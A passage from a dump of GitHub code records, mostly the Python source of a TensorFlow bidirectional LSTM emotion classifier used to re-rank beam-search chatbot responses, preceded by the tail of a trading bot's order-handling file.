tradeapi.rest.APIError as err:\n print(err)\n container = None\n return container\n return wrapper\n\n def close_orders(self,order_id):\n self.api.cancel_order(order_id=order_id)","repo_name":"kesler20/trading_bot","sub_path":"orders.py","file_name":"orders.py","file_ext":"py","file_size_in_byte":6370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30436130741","text":"import os\r\nimport sys\r\nimport random\r\nimport argparse\r\n\r\nimport tensorflow.compat.v1 as tf\r\n\r\nfrom src.configuration import ChatConfig\r\n\r\ntf.disable_v2_behavior()\r\nimport numpy as np\r\n\r\nfrom src.utils import matrix_initializer, truncated_normal_initializer_variable, zero_initializer_variable\r\nfrom data_utils.prepare_dialogue_data import get_word_count, construct_word_dict, read_emotion_words, construct_vocab, \\\r\n get_word_list, read_word_embeddings\r\n\r\n__author__ = \"Jocelyn\"\r\n\r\n# emotion_dict = {\"anger\": 0, \"disgust\": 1, \"happiness\": 2, \"like\": 3, \"sadness\": 4, \"neutral\": 5}\r\nemotion_dict = {\"anger\": 0, \"disgust\": 1, \"fear\": 2, \"joy\": 3, \"neutral\": 4, \"sadness\": 5, \"surprise\": 6}\r\nid2emotion = {idx: emotion for emotion, idx in emotion_dict.items()}\r\nFLAGS = None\r\n\r\n\r\nclass LstmClassifier(object):\r\n def __init__(self, word_embeddings, words2idx, embedding_size, hidden_size, emotion_class, batch_size,\r\n max_len, use_lstm, session, keep_prob=2.0, learning_rate=0.1, lr_decay=0.5, name=\"lstm_classifier\"):\r\n self.embedding_size = embedding_size\r\n self.hidden_size = hidden_size\r\n self.emotion_class = emotion_class\r\n self.batch_size = batch_size\r\n self.max_len = max_len\r\n self.use_lstm = use_lstm\r\n self.sess = session\r\n self.keep_prob = keep_prob\r\n self.learning_rate_decay_factor = lr_decay\r\n self.name = name\r\n\r\n # word embeddings\r\n self.words2idx = words2idx\r\n self.idx2words = {idx: word for word, idx in self.words2idx.items()}\r\n print(\"word embeddings size here\")\r\n # print(np.shape(word_embeddings))\r\n self.embeddings = matrix_initializer(w=word_embeddings, name=self.name + \"_word_embeddings\")\r\n self.vocab_size = len(words2idx)\r\n\r\n # softmax\r\n self.sfx_w = truncated_normal_initializer_variable(width=hidden_size,\r\n shape=[2 * self.hidden_size, 
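Two issues in `KELLY_CRITERION` above: the sizing formula `lot_size = (2*p_w - p_l)/2` simplifies to (3p - 1)/2, which is not the textbook Kelly fraction, and the unconditional `qty = 1` after the keyboard-mash comment makes the entire computation dead code. The classic criterion, as a hedged standalone sketch:

def kelly_fraction(p_win, payoff_ratio=1.0):
    # Kelly criterion: f* = p - q/b, where b is the average win/loss
    # payoff ratio; with even-money bets (b = 1) it reduces to 2p - 1.
    q = 1.0 - p_win
    return max(0.0, p_win - q / payoff_ratio)

# Illustrative sizing with hypothetical numbers (55% win rate,
# $10,000 balance, $150 share price):
qty = round(kelly_fraction(0.55) * 10000.0 / 150.0)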
self.emotion_class],\r\n name=self.name+\"_softmax_w\")\r\n self.sfx_b = zero_initializer_variable(shape=[self.emotion_class], name=self.name+\"_softmax_b\")\r\n\r\n # placeholder\r\n self.input_x = tf.placeholder(shape=[self.batch_size, self.max_len], dtype=tf.int32, name=self.name+\"_input_x\")\r\n self.input_y = tf.placeholder(shape=[self.batch_size], dtype=tf.int32, name=self.name+\"_input_y\")\r\n self.input_len = tf.placeholder(shape=[self.batch_size], dtype=tf.int32, name=self.name+\"_input_len\")\r\n\r\n self.input_x_beam = tf.placeholder(shape=[self.batch_size,20, self.max_len], dtype=tf.int32,\r\n name=self.name + \"_input_x_beam\")\r\n self.input_len_beam = tf.placeholder(shape=[self.batch_size,20], dtype=tf.int32, name=self.name + \"_input_len_beam\")\r\n self.input_emo= tf.placeholder(shape=[self.batch_size,20],dtype=tf.int32, name=self.name+\"_input_emo\")\r\n\r\n\r\n self.forward_cell = self.rnn_cell()\r\n self.backward_cell = self.rnn_cell()\r\n\r\n # loss\r\n self.loss = self.compute_loss()\r\n self.pred_scores = self.predict_scores()\r\n self.pred_labels = tf.argmax(self.pred_scores, axis=1)\r\n self.beam_pred_labels= self.beam_fetch()\r\n\r\n tf.summary.scalar(\"loss\", self.loss)\r\n\r\n self.global_step = tf.Variable(0, name=self.name + \"_global_step\", trainable=False)\r\n self.lr = tf.Variable(learning_rate, dtype=tf.float32,name=self.name + \"_lr\",trainable=False)\r\n self.train = self.optimize()\r\n\r\n self.sess.run(tf.global_variables_initializer())\r\n\r\n # self.variables_dict={'lstm_classifier_global_step':self.global_step,'lstm_classifier_softmax_b':self.sfx_b,'lstm_classifier_softmax_w':self.sfx_w,'lstm_classifier_word_embeddings':self.embeddings}\r\n self.saver = tf.train.Saver()\r\n\r\n def basic_rnn_cell(self):\r\n if self.use_lstm:\r\n return tf.nn.rnn_cell.BasicLSTMCell(self.hidden_size, forget_bias=0.0, state_is_tuple=True,\r\n reuse=tf.get_variable_scope().reuse)\r\n else:\r\n return tf.nn.rnn_cell.GRUCell(self.hidden_size, reuse=tf.get_variable_scope().reuse)\r\n\r\n def rnn_cell(self):\r\n single_cell = self.basic_rnn_cell\r\n if self.keep_prob < 1.0:\r\n def single_cell():\r\n return tf.nn.rnn_cell.DropoutWrapper(single_cell, output_keep_prob=self.keep_prob)\r\n cell = single_cell()\r\n # cell = tf.nn.rnn_cell.MultiRNNCell([single_cell() for _ in range(self.num_layers)], state_is_tuple=True)\r\n return cell\r\n\r\n def lstm_process(self):\r\n input_embeddings = tf.nn.embedding_lookup(self.embeddings, self.input_x) # [batch, max_time, embedding size]\r\n\r\n initiate_state_forward = self.forward_cell.zero_state(self.batch_size, dtype=tf.float32)\r\n initiate_state_backward = self.backward_cell.zero_state(self.batch_size, dtype=tf.float32)\r\n outputs, states = tf.nn.bidirectional_dynamic_rnn(self.forward_cell, self.backward_cell, input_embeddings,\r\n sequence_length=self.input_len,\r\n initial_state_fw=initiate_state_forward,\r\n initial_state_bw=initiate_state_backward,\r\n dtype=tf.float32)\r\n output_fw_state, output_bw_state = states\r\n final_states = tf.concat([output_fw_state, output_bw_state], axis=-1) # [2, batch, 2 * hidden]\r\n split_states_outputs = tf.split(final_states, num_or_size_splits=2, axis=0)\r\n final_states = tf.reshape(split_states_outputs[1], [self.batch_size, 2 * self.hidden_size])\r\n \"\"\"\r\n outputs, states = tf.nn.dynamic_rnn(self.forward_cell, input_embeddings, sequence_length=self.input_len,\r\n initial_state=initiate_state_forward, dtype=tf.float32)\r\n split_states_outputs = tf.split(states, 
num_or_size_splits=2, axis=0)\r\n final_states = tf.reshape(split_states_outputs[1], [self.batch_size, self.hidden_size])\r\n \"\"\"\r\n return final_states\r\n\r\n def lstm_process_beam(self):\r\n input_x_re=[]\r\n final_states_re=[]\r\n # 每个beam单独处理\r\n for i in range(20):\r\n input_x_inn = []\r\n input_len_inn=[]\r\n for j in range(self.batch_size):\r\n # input_x_inn形状是[batch_size,max_len]\r\n # input_len_beam形状就是[batch_size]\r\n input_x_inn.append(self.input_x_beam[j][i])\r\n input_len_inn.append(self.input_len_beam[j][i])\r\n # input_x_re形状就成了[beam,batch_size,max_len]\r\n print(\"input_len_beam here:\")\r\n print(len(input_len_inn))\r\n input_x_re.append(input_x_inn)\r\n\r\n input_embeddings = tf.nn.embedding_lookup(self.embeddings,input_x_inn) # [batch, max_time, embedding size]\r\n\r\n initiate_state_forward = self.forward_cell.zero_state(self.batch_size, dtype=tf.float32)\r\n initiate_state_backward = self.backward_cell.zero_state(self.batch_size, dtype=tf.float32)\r\n outputs, states = tf.nn.bidirectional_dynamic_rnn(self.forward_cell, self.backward_cell, input_embeddings,\r\n sequence_length=input_len_inn,\r\n initial_state_fw=initiate_state_forward,\r\n initial_state_bw=initiate_state_backward,\r\n dtype=tf.float32)\r\n output_fw_state, output_bw_state = states\r\n final_states = tf.concat([output_fw_state, output_bw_state], axis=-1) # [2, batch, 2 * hidden]\r\n split_states_outputs = tf.split(final_states, num_or_size_splits=2, axis=0)\r\n final_states = tf.reshape(split_states_outputs[1], [self.batch_size, 2 * self.hidden_size])\r\n final_states_re.append(final_states)\r\n return final_states_re\r\n\r\n\r\n def compute_loss(self):\r\n final_states = self.lstm_process()\r\n logits = tf.matmul(final_states, self.sfx_w) + self.sfx_b\r\n entropy_loss = tf.nn.sparse_softmax_cross_entropy_with_logits(labels=self.input_y, logits=logits)\r\n loss = tf.reduce_sum(entropy_loss) / self.batch_size\r\n return loss\r\n\r\n def predict_scores(self):\r\n final_states = self.lstm_process()\r\n logits = tf.matmul(final_states, self.sfx_w) + self.sfx_b\r\n scores = tf.nn.softmax(logits, dim=-1)\r\n return scores\r\n\r\n def beam_fetch(self):\r\n final_states=self.lstm_process_beam()\r\n scores_re=[]\r\n score_res_gro=[]\r\n for i in range(20):\r\n logits=tf.matmul(final_states[i],self.sfx_w)+self.sfx_b\r\n scores=tf.nn.softmax(logits,dim=-1)\r\n scores_re.append(scores)\r\n # score_re的形状:[beam,batch_size,total-7]\r\n for j in range(self.batch_size):\r\n score_res_col=[]\r\n for i in range(20):\r\n emo_index=self.input_emo[j][i]\r\n emo_tar=scores_re[i][j][emo_index]\r\n score_res_col.append(emo_tar)\r\n print('length of score_res_col')\r\n print(len(score_res_col))\r\n score_res_gro.append(score_res_col)\r\n\r\n\r\n return score_res_gro\r\n\r\n\r\n\r\n def optimize(self):\r\n optimizer = tf.train.GradientDescentOptimizer(self.lr)\r\n trainer = optimizer.minimize(self.loss)\r\n return trainer\r\n\r\n def train_step(self, this_input_x, this_input_y, this_input_len):\r\n output_feed = [self.train, self.loss]\r\n input_feed = {self.input_x: this_input_x,\r\n self.input_y: this_input_y,\r\n self.input_len: this_input_len}\r\n _, loss = self.sess.run(output_feed, input_feed)\r\n return loss\r\n\r\n def predict_step(self, this_input_x, this_input_len):\r\n output_feed = [self.pred_labels]\r\n input_feed = {self.input_x: this_input_x,\r\n self.input_len: this_input_len}\r\n results = self.sess.run(output_feed, input_feed)\r\n return results[0]\r\n\r\n def beam_predict_step(self, this_input_x, 
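`rnn_cell` above carries a latent bug: inside the `keep_prob < 1.0` branch, `def single_cell():` shadows the `single_cell` name, so `DropoutWrapper` would receive a function object rather than a cell. It goes unnoticed only because the default `keep_prob=2.0` skips the branch. A minimal fix:

def rnn_cell(self):
    # Build the cell first, then wrap it; the original shadows
    # `single_cell` and would hand DropoutWrapper a function, not a cell.
    cell = self.basic_rnn_cell()
    if self.keep_prob < 1.0:
        cell = tf.nn.rnn_cell.DropoutWrapper(cell, output_keep_prob=self.keep_prob)
    return cell

# Separately, the concat/split dance on the bidirectional states is an
# indirect way of selecting the hidden state h from each direction's
# LSTMStateTuple; tf.concat([states[0].h, states[1].h], axis=-1) says
# the same thing directly.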
this_input_len,this_input_emo):\r\n output_feed = [self.beam_pred_labels]\r\n input_feed = {self.input_x_beam: this_input_x,\r\n self.input_len_beam: this_input_len,\r\n self.input_emo:this_input_emo\r\n }\r\n results = self.sess.run(output_feed, input_feed)\r\n return results[0]\r\n\r\n def get_train_batch(self, input_responses, input_labels, input_lengths, index):\r\n this_input_x = input_responses[index * self.batch_size: (index + 1) * self.batch_size]\r\n this_input_y = input_labels[index * self.batch_size: (index + 1) * self.batch_size]\r\n this_input_len = input_lengths[index * self.batch_size: (index + 1) * self.batch_size]\r\n return this_input_x, this_input_y, this_input_len\r\n\r\n def get_pred_batch(self, input_responses, input_lengths, index):\r\n this_input_x = input_responses[index * self.batch_size: (index + 1) * self.batch_size]\r\n this_input_len = input_lengths[index * self.batch_size: (index + 1) * self.batch_size]\r\n return this_input_x, this_input_len\r\n\r\n# 是一个将回答的句子分成单词的函数\r\ndef read_emotional_response_label_file(train_res_file, train_label_file, max_len=30):\r\n f1 = open(train_res_file, \"r\", encoding=\"utf-8\")\r\n f2 = open(train_label_file, \"r\", encoding=\"utf-8\")\r\n res_lines = f1.readlines()\r\n label_lines = f2.readlines()\r\n\r\n\r\n train_responses = []\r\n train_labels = []\r\n train_lens = []\r\n for res_line, label_line in zip(res_lines, label_lines):\r\n # 去掉label首尾的空格\r\n label = label_line.strip()\r\n\r\n if label not in emotion_dict.keys():\r\n continue\r\n words = res_line.strip().split()\r\n print(words)\r\n # split()函数是用来分割句子的,用空格和/n来切分,其实就是把句子分成一个个单词\r\n if len(words) > max_len:\r\n # 如果超过了,就直接砍掉后面多余的\r\n words = words[: max_len]\r\n train_responses.append(words)\r\n # 在response后面把words拼上去,其实也就是把response分成单词放进train_responses里面\r\n train_labels.append(emotion_dict[label])\r\n # 把情绪的也放进去\r\n train_lens.append(len(words))\r\n # 把回答的长度也放进去\r\n return train_responses, train_labels, train_lens\r\n\r\n# 是一个将回答的句子分成单词的函数\r\ndef read_test_emotional_response_label_file(train_res_file, max_len=30):\r\n f1 = open(train_res_file, \"r\", encoding=\"utf-8\")\r\n res_lines = f1.readlines()\r\n print(\"lines from file\")\r\n print(len(res_lines))\r\n train_responses = []\r\n train_lens = []\r\n for res_line in res_lines:\r\n words = res_line.strip().split()\r\n # print(words)\r\n # split()函数是用来分割句子的,用空格和/n来切分,其实就是把句子分成一个个单词\r\n if len(words) > max_len:\r\n # 如果超过了,就直接砍掉后面多余的\r\n words = words[: max_len]\r\n train_responses.append(words)\r\n # 把情绪的也放进去\r\n train_lens.append(len(words))\r\n # 把回答的长度也放进去\r\n return train_responses, train_lens\r\n\r\ndef read_test_data(filename, max_len):\r\n f = open(filename, \"r\", encoding=\"utf-8\")\r\n lines = f.readlines()\r\n\r\n responses = []\r\n train_lens = []\r\n for line in lines:\r\n words = line.strip().split()\r\n if len(words) > max_len:\r\n words = words[: max_len]\r\n responses.append(words)\r\n train_lens.append(len(words))\r\n return responses, train_lens\r\n\r\n# 补齐responses的函数(补齐成max_len)\r\ndef response_to_indexs(train_responses, word_dict, word_unk_id, max_len):\r\n new_responses = []\r\n for response in train_responses:\r\n # 在通用词词典里找到句子中的单词,如果没有就用unk\r\n new_response = [word_dict[word] if word in word_dict else word_unk_id for word in response]\r\n if len(new_response) < max_len:\r\n # 如果长度不够就用unk补齐\r\n remain = max_len - len(new_response)\r\n for i in range(remain):\r\n new_response.append(word_unk_id)\r\n new_responses.append(new_response)\r\n return new_responses\r\n\r\n# 
处理不能被batchsize整除的样本集\r\ndef align_train_batch_size(train_responses, emotion_labels, response_lens, batch_size):\r\n length = len(train_responses)\r\n if length % batch_size != 0: # 如果不能被完整分批次\r\n remain = batch_size - length % batch_size # 是去掉多余的后剩下有多少\r\n total_data = [[res, label, length] for res, label, length in\r\n zip(train_responses, emotion_labels, response_lens)]\r\n sequence = range(length)\r\n for _ in range(remain):\r\n index = random.choice(sequence) # 会随机选中一个response的index\r\n total_data.append(total_data[index])\r\n train_responses = [data[0] for data in total_data]\r\n emotion_labels = [data[1] for data in total_data]\r\n response_lens = [data[2] for data in total_data]\r\n return train_responses, emotion_labels, response_lens\r\n\r\ndef align_test_batch_size(test_response_without,response_lens, batch_size):\r\n length = len(test_response_without)\r\n if length % batch_size != 0: # 如果不能被完整分批次\r\n remain = batch_size - length % batch_size # 是去掉多余的后剩下有多少\r\n total_data = [[res, length] for res, length in\r\n zip(test_response_without, response_lens)]\r\n sequence = range(length)\r\n for _ in range(remain):\r\n index = random.choice(sequence) # 会随机选中一个response的index\r\n total_data.append(total_data[index])\r\n test_response_without = [data[0] for data in total_data]\r\n response_lens = [data[1] for data in total_data]\r\n return test_response_without, response_lens\r\n\r\n\r\n\r\ndef shuffle_train_data(train_responses, emotion_labels, response_lens):\r\n total_data = [[res, label, length] for res, label, length in\r\n zip(train_responses, emotion_labels, response_lens)]\r\n # 随机排序\r\n random.shuffle(total_data)\r\n train_responses = [data[0] for data in total_data]\r\n emotion_labels = [data[1] for data in total_data]\r\n response_lens = [data[2] for data in total_data]\r\n return train_responses, emotion_labels, response_lens\r\n\r\n\r\ndef write_labels(file_name, labels):\r\n f = open(file_name, \"w\", encoding=\"utf-8\")\r\n for label in labels:\r\n f.write(id2emotion[label])\r\n f.write(\"\\n\")\r\n f.close()\r\n\r\n\r\ndef split_train_valid_data(train_responses, train_labels, train_lens):\r\n # 回答的总长度,即有多少个回答\r\n total_length = len(train_responses)\r\n train_len = int(total_length * 0.9)\r\n # 取总长度的0.1\r\n valid_len = total_length - train_len\r\n # 随意取total_length里的一部分作为valid_len范围(验证集)里的有效长度\r\n sequence = random.sample(range(total_length), valid_len)\r\n training_res, training_labels, training_lens, valid_res, valid_labels, valid_lens = [], [], [], [], [], []\r\n for i in range(total_length):\r\n # 如果i在valid_len里面\r\n if i in sequence:\r\n valid_res.append(train_responses[i]) # 把对应的回答放进去\r\n valid_labels.append(train_labels[i]) # 把标签放进去\r\n valid_lens.append(train_lens[i]) # 把这个回答的长度放进去(选中的这个回答的长度)\r\n else: # 如果不是,就不要放进valid数组\r\n training_res.append(train_responses[i])\r\n training_labels.append(train_labels[i])\r\n training_lens.append(train_lens[i])\r\n return training_res, training_labels, training_lens, valid_res, valid_labels, valid_lens\r\n\r\n\r\ndef compute_accuracy(pred_labels, true_labels):\r\n total_len = len(pred_labels)\r\n num = 0\r\n for pred, true_label in zip(pred_labels, true_labels):\r\n if pred == true_label:\r\n num += 1\r\n acc = float(num) / total_len\r\n return acc\r\n\r\n# 读embeddings文件并且转成embedding的函数\r\ndef read_total_embeddings(embedding_file, vocab_size):\r\n embeddings = list()\r\n # 构造一个词典\r\n word2id = dict()\r\n id2word = dict()\r\n word_list=[]\r\n f = open(embedding_file, \"r\", encoding=\"utf-8\")\r\n for line in f.readlines()[: 
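`split_train_valid_data` above tests `i in sequence` against the plain list returned by `random.sample`, which makes the 90/10 split quadratic in corpus size; a set turns each lookup into O(1). A hedged rewrite with the same return order:

def split_train_valid_data(responses, labels, lens, valid_ratio=0.1):
    # Same 90/10 split, but with O(1) membership tests via a set.
    total = len(responses)
    valid_idx = set(random.sample(range(total), int(total * valid_ratio)))
    tr, va = ([], [], []), ([], [], [])
    for i, item in enumerate(zip(responses, labels, lens)):
        bucket = va if i in valid_idx else tr
        for part, value in zip(bucket, item):
            part.append(value)
    return (*tr, *va)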
vocab_size]:\r\n # strip() 方法用于移除字符串头尾指定的字符(默认为空格或换行符)或字符序列。\r\n # split()函数是用来分割句子的,用空格和/n来切分,其实就是把句子分成一个个单词\r\n lemmas = line.strip().split()\r\n # 说明这个文件每一行的第一个单词都是这个embedding代表的单词\r\n word = lemmas[0].strip()\r\n embedding = list()\r\n for lemma in lemmas[1:]:\r\n # 把str模式的float转成真正的float\r\n embedding.append(float(lemma.strip()))\r\n # print(\"embedding:\" + str(len(embedding)))\r\n index = len(word2id)\r\n # 制作单词到index的词典\r\n word2id[word] = index\r\n # 制作index到单词的词典\r\n id2word[index] = word\r\n embeddings.append(embedding)\r\n word_list.append(word)\r\n\r\n return embeddings, word2id, id2word,word_list\r\n\r\ndef index_test_data(test_data, id2words):\r\n \"\"\"\r\n write post and most correct response data\r\n :param test_data:\r\n :param write_file:\r\n :param id2words:\r\n :param test_emotion_labels:\r\n :return:\r\n \"\"\"\r\n # f = open(write_file, \"w\", encoding=\"utf-8\")\r\n generate_data=[]\r\n for data in test_data:\r\n generate_data_b=[]\r\n for data_b in data:\r\n words = [id2words[index] if index in range(len(id2words)) else 0 for index in data_b]\r\n\r\n sentence = \" \".join(str(word) for word in words)\r\n final_sentence = sentence\r\n generate_data_b.append(final_sentence)\r\n generate_data.append(generate_data_b)\r\n return generate_data\r\n\r\ndef change_file_format(origin):\r\n # [origin]的形状是:[batch_size,beam_size,max_len]\r\n start_symbol = \"\"\r\n end_symbol = \"\"\r\n new=[]\r\n\r\n # f1 = open(file1, \"r\", encoding=\"utf-8\")\r\n # f2 = open(file2, \"w\", encoding=\"utf-8\")\r\n for line in origin:\r\n new_b=[]\r\n for line_b in line:\r\n line_str=' '.join(line_b)\r\n words = line_str.strip().split()\r\n words = words[1:]\r\n if start_symbol in words:\r\n start_index = words.index(start_symbol) + 1\r\n else:\r\n start_index = 0\r\n if end_symbol in words:\r\n end_index = words.index(end_symbol)\r\n else:\r\n end_index = len(words)\r\n selected_words = words[start_index: end_index]\r\n sentence = \" \".join(selected_words)\r\n new_b.append(sentence)\r\n new.append(new_b)\r\n return new\r\n\r\ndef add_emo_beam(beam_size,emos_data):\r\n # emos_data的形状是:[batch_size,1]\r\n new_emos=[]\r\n for emo in emos_data:\r\n new_emos_in = []\r\n for i in range(beam_size):\r\n new_emos_in.append(emo)\r\n new_emos.append(new_emos_in)\r\n # new_emos的形状就变成了[batch_size,beam_size]\r\n # 并且同一个beam里,情感都是一样的\r\n return new_emos\r\n # for i in range(beam_size):\r\n # new_emos_in = []\r\n # for emo in emos_data:\r\n # new_emos_in.append(emo)\r\n # new_emos.append(new_emos_in)\r\n # # new_emos的形状就变成了[batch_size,beam_size]\r\n # # 并且同一个beam里,情感都是一样的\r\n # return new_emos\r\n\r\n\r\ndef read_beam_test(test_res,test_emo,max_len=30):\r\n # test_res:[batch_size,beam,max_len]\r\n # test_emo:[batch_size,beam]\r\n test_responses=[]\r\n test_lens=[]\r\n test_emos=[]\r\n for res_b,emo_b in zip(test_res,test_emo):\r\n test_responses_b = []\r\n test_lens_b = []\r\n test_emos_b = []\r\n for res,emo in zip(res_b,emo_b):\r\n words= res.strip().split()\r\n emo_s=emo\r\n if emo_s not in range(7):\r\n continue\r\n if len(words) > max_len:\r\n # 如果超过了,就直接砍掉后面多余的\r\n words = words[: max_len]\r\n test_responses_b.append(words)\r\n test_lens_b.append(len(words))\r\n test_emos_b.append(emo_s)\r\n test_responses.append(test_responses_b)\r\n test_lens.append(test_lens_b)\r\n test_emos.append(test_emos_b)\r\n return test_responses,test_lens,test_emos\r\n\r\ndef response_to_indexs_b(train_responses, word_dict, word_unk_id, max_len):\r\n new_responses = []\r\n for response_o in train_responses:\r\n 
new_responses_b=[]\r\n for response in response_o:\r\n # 在通用词词典里找到句子中的单词,如果没有就用unk\r\n new_response = [word_dict[word] if word in word_dict else word_unk_id for word in response]\r\n if len(new_response) < max_len:\r\n # 如果长度不够就用unk补齐\r\n remain = max_len - len(new_response)\r\n for i in range(remain):\r\n new_response.append(word_unk_id)\r\n new_responses_b.append(new_response)\r\n new_responses.append(new_responses_b)\r\n return new_responses\r\n\r\ndef train_b(train_response_file, train_label_file, test_res_file, test_label_file, max_len, word_count_file, vocab_size,\r\n embedding_file, embedding_size, batch_size, num_epoch, hidden_size, emotion_class, pred_label_file, session,generate_words, scores,this_emotion_labels,lstm_emotion_machine):\r\n print(\"read word and embeddings\\n\")\r\n model_path = os.path.dirname(os.path.dirname(os.path.abspath(\"lstm_classifier.py\")))\r\n data_dir = os.path.join(model_path, \"data\")\r\n embeddings, total_word_dict, id2word,word_l=read_total_embeddings(embedding_file, vocab_size)\r\n word_unk_id = total_word_dict['']\r\n\r\n print(\"reading training data\\n\")\r\n # 将回答的句子分成单词\r\n train_responses, train_labels, train_lens = read_emotional_response_label_file(train_response_file,\r\n train_label_file,\r\n max_len)\r\n # 补齐responses(补齐成max_len)\r\n train_responses = response_to_indexs(train_responses, total_word_dict, word_unk_id, max_len)\r\n # train_responses, train_labels什么的都会更新,会把valid的放出去,也就是随机分出验证集\r\n train_responses, train_labels, train_lens, valid_res, valid_labels, valid_lens = \\\r\n split_train_valid_data(train_responses, train_labels, train_lens)\r\n # 处理不能被batch_size整除的train样本集,随机挑一些直接砍掉\r\n train_responses, train_labels, train_lens = align_train_batch_size(train_responses, train_labels, train_lens,\r\n batch_size)\r\n # 处理不能被batch_size整除的valid样本集,随机挑一些直接砍掉\r\n valid_res, valid_labels, valid_lens = align_train_batch_size(valid_res, valid_labels, valid_lens, batch_size)\r\n\r\n # 读测试数据,和训练集一样的操作\r\n print(\"Read prediction data!\\n\")\r\n test_responses,test_lens = read_test_emotional_response_label_file(test_res_file,max_len)\r\n print(len(test_responses))\r\n\r\n test_responses = response_to_indexs(test_responses, total_word_dict, word_unk_id, max_len)\r\n\r\n test_length = len(test_responses)\r\n test_responses, test_lens = align_test_batch_size(test_responses,test_lens, batch_size)\r\n\r\n # 定义bi-lstm的模型\r\n print(\"Define model!\\n\")\r\n lstm_emotion_machine = LstmClassifier(embeddings, word_dict, embedding_size, hidden_size, emotion_class, batch_size,max_len, True, session, learning_rate=0.1)\r\n # 开始训练\r\n # 开始训练\r\n print(\"training\\n\")\r\n # 一共有多少批训练集\r\n\r\n train_batch = int(len(train_responses) / batch_size)\r\n # 一共有多少批验证集\r\n valid_batch = int(len(valid_res) / batch_size)\r\n valid_accs = []\r\n best_valid_acc = -1.0\r\n ckpt_path = os.path.join(os.path.join(model_path, \"data_utils/check_path_lstm\"), \"check_path_lstm\")\r\n # 开始训练\r\n for i in range(num_epoch):\r\n print(\"Now train epoch %d!\\n\" % (i + 1))\r\n # 首先随机排序,即打乱顺序\r\n train_responses, train_labels, train_lens = shuffle_train_data(train_responses, train_labels, train_lens)\r\n\r\n for j in range(train_batch):\r\n # 处理输入,处理成能直接喂进去的形式\r\n this_res, this_label, this_len = lstm_emotion_machine.get_train_batch(train_responses, train_labels,\r\n train_lens, j)\r\n # 计算损失\r\n loss = lstm_emotion_machine.train_step(this_res, this_label, this_len)\r\n print(\"epoch=%d, batch=%d, loss=%f\\n\" % ((i + 1), (j + 1), loss))\r\n # 验证集验证开始\r\n labels = []\r\n for k in 
range(valid_batch):\r\n this_res, this_label, this_len = lstm_emotion_machine.get_train_batch(valid_res, valid_labels,\r\n valid_lens, k)\r\n # 输出预测出来的labels,可能有多个?\r\n this_labels = lstm_emotion_machine.predict_step(this_res, this_len)\r\n labels.extend(this_labels)\r\n # 计算准确度\r\n accuracy = compute_accuracy(labels, valid_labels)\r\n print(\"epoch=%d, accuracy=%f\\n\" % ((i + 1), accuracy))\r\n valid_accs.append(accuracy)\r\n # 保存这次的结果\r\n if best_valid_acc < accuracy:\r\n best_valid_acc = accuracy\r\n lstm_emotion_machine.saver.save(lstm_emotion_machine.sess, ckpt_path, global_step=(i + 1) * train_batch)\r\n #lstm_emotion_machine.save_weights(FLAGS.checkpoint_path)\r\n # 取最好的和平均的准确率\r\n best_acc = np.max(valid_accs)\r\n ave_acc = np.average(valid_accs)\r\n print(\"best acc=%f, average acc=%f\\n\" % (best_acc, ave_acc))\r\n\r\n\r\n # last_ckpt = lstm_emotion_machine.saver.last_checkpoints\r\n # print(\"test here\")\r\n # print(last_ckpt)\r\n # restore_path = lstm_emotion_machine.saver.last_checkpoints[0]\r\n\r\n\r\n checkpoint_path = os.path.join(os.path.join(model_path, \"data_utils/check_path_lstm\"), \"check_path_lstm-11728\")\r\n\r\n\r\n # lstm_emotion_machine.saver.restore(lstm_emotion_machine.sess, checkpoint_path)\r\n\r\n # 移动过来的\r\n generate_words=index_test_data(generate_words,id2word)\r\n # 去掉start和end_id\r\n generate_words=change_file_format(generate_words)\r\n # 把emo也变成beam个重复的数据形状\r\n this_emotion_labels=add_emo_beam(20,this_emotion_labels)\r\n\r\n test_responses,test_lens,this_emotion_labels= read_beam_test(generate_words,this_emotion_labels,FLAGS.max_len)\r\n test_responses = response_to_indexs_b(test_responses, total_word_dict, word_unk_id, FLAGS.max_len)\r\n\r\n total_labels = []\r\n # for k in range(pred_batches):\r\n # 处理输入\r\n # this_res, this_len = lstm_emotion_machine.get_pred_batch(test_responses, chat_config.max_len, k)\r\n # 输出预测的labels,形状是[batch_size,beam,1]\r\n # tf.reset_default_graph()\r\n this_labels_scores = lstm_emotion_machine.beam_predict_step(test_responses, test_lens, this_emotion_labels)\r\n scores_mul = []\r\n max_col = []\r\n for ge_score, emo_score in zip(scores, this_labels_scores):\r\n scores_mul_b = []\r\n for ge_score_b, emo_score_b in zip(ge_score, emo_score):\r\n scores_mul_b.append(ge_score_b * emo_score_b)\r\n scores_mul.append(scores_mul_b)\r\n # max_col的形状是[batch_size,1],类型是tensor\r\n for scores in scores_mul:\r\n max_index = scores.index(max(scores))\r\n max_col.append(max_index)\r\n for i in range(batch_size):\r\n print(max_col[i])\r\n\r\n total_labels.append(generate_words[i][max_col[i]])\r\n return total_labels\r\n\r\n '''\r\n pred_batches = int(len(test_responses) / batch_size)\r\n total_labels = []\r\n for k in range(pred_batches):\r\n # 处理输入\r\n this_res, this_len = lstm_emotion_machine.get_pred_batch(test_responses, test_lens, k)\r\n # 输出预测的labels\r\n this_labels = lstm_emotion_machine.predict_step(this_res, this_len)\r\n total_labels.extend(this_labels)\r\n\r\n print(\"check here length\")\r\n print(len(test_responses))\r\n print(len(total_labels))\r\n write_labels(pred_label_file, total_labels)\r\n\r\n return lstm_emotion_machine\r\n '''\r\n # print(len(total_labels))\r\n\r\n\r\ndef train(config_file,train_response_file, train_label_file, test_res_file, test_label_file, max_len, word_count_file, vocab_size,\r\n embedding_file, embedding_size, batch_size, num_epoch, hidden_size, emotion_class, pred_label_file,pre_train_word_count_file,emotion_words_dir, session):\r\n chat_config = ChatConfig(config_file)\r\n print(\"read word and 
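The beam-reranking block in `train_b` boils down to: multiply each candidate's generation score by the classifier's probability for the requested emotion, then keep the argmax per batch item. (Note that `train_b` also passes an undefined `word_dict` to `LstmClassifier`; only `total_word_dict` exists in that scope.) A hedged distillation of the reranker:

def rerank_beams(gen_scores, emo_scores, candidates):
    # gen_scores / emo_scores / candidates are [batch][beam] lists; a
    # beam's final score is p_generation * p_target_emotion, and the
    # best-scoring candidate sentence wins for each batch item.
    best = []
    for gens, emos, cands in zip(gen_scores, emo_scores, candidates):
        combined = [g * e for g, e in zip(gens, emos)]
        best.append(cands[combined.index(max(combined))])
    return best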
